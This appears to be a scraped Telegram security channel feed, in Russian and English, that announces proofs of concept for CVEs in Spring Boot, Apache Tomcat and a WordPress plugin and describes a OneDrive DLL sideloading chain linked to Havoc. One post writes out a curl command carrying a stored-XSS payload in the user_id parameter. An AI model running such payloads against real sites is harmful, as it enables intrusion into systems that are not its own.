CVE-2024-38819
*
Spring Boot 3.3.4, based on Spring Framework 6.1.13 path traversal exploit
*
POC + docker
*
Spring Boot 3.3.4, based on Spring Framework 6.1.13 path traversal exploit
*
POC + docker
👍16
На завтра уже, споть
*
90-Day Cybersecurity Plan
*
Cloud Security Labs
*
linux-attack-forensics-purple labs
*
90-Day Cybersecurity Plan
*
Cloud Security Labs
*
linux-attack-forensics-purple labs
👍16🔥11
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-50379 Apache Tomcat
*
Проблема с состоянием гонки времени проверки времени использования (
*
Exploitation and POC
*
Проблема с состоянием гонки времени проверки времени использования (
TOCTOU), которое может привести к удаленному выполнению кода (RCE), особенно в файловых системах, нечувствительных к регистру, таких как Windows.*
Exploitation and POC
👍15🔥5
CVE-2024-10793
*
Плагин WP Activity Log для
Хранимая XSS через параметр user_id во всех версиях до 5.2.1
*
Плагин WP Activity Log для
WordPressХранимая XSS через параметр user_id во всех версиях до 5.2.1
curl -X POST 'http://example.com/wp-admin/admin-ajax.php' \
-d 'action=destroy-sessions&user_id=<noscript>alert("XSS found 1")</noscript>'
🔥13😱5👍2
Отлично ))))
onedrive.exe загружает подделанный sppc.dll, который, в свою очередь, загружает onedrive.dll и расшифровывает его с помощью системной функции RC4033 и жестко запрограммированного ключа. Расшифрованная полезная нагрузка, похоже, связана с havoc🔥20😱15